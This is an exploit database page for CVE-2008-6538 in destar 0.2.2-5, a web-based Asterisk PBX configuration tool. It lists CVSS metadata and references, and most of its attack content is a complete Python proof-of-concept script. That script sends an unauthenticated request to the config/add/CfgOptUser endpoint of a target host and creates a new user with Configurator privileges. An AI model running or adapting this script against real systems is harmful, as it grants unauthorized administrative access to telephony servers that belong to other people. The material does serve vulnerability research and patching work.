destar 0.2.2-5 Arbitrary Add New User Exploit

2009-03-30 / 2009-03-31
Credit: Enero
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-6538
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# #!/usr/bin/python # # Exploit for destar 0.2.2-5, tested on Linux Debian # # Bug found and exploit coded by a non root user # # http://nonroot.blogspot.com # # Enero 2008 # # This is a PoC, please use it just for learning how to exploit something # # use: $python ./exploit_code.py # # required: urllib,urllib2 sys and re # import urllib,urllib2 import sys,re print "Target host: i.e: http://127.0.0.1:8080/" host=raw_input("Target host ( include http and /): ") #info for the new user # user='mama' password='mama' source_ip='127.0.0.9' phone='' level='Configurator' language='en' # # req = urllib2.Request(host) adduser = urllib.urlencode({'name': user, 'secret': password, 'pc' : source_ip, 'submit' : "Submit", 'phone' : phone, 'level' : level, 'language' : language}) req.add_header('X_FORWARDED_FOR','') req = urllib2.Request(host+"config/add/CfgOptUser") r = urllib2.urlopen(req,adduser) data=r.read() lookup=re.compile("There were errors").search match=lookup(data) if not match: print "Ok, now go and test your user at:",host else: print "Exploit failed, sorry, go and find some new bug or check this code and fix it!" sys.exit(2) sys.exit(0)

References:

http://xforce.iss.net/xforce/xfdb/41384
http://www.securityfocus.com/bid/28426
http://www.milw0rm.com/exploits/5298


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top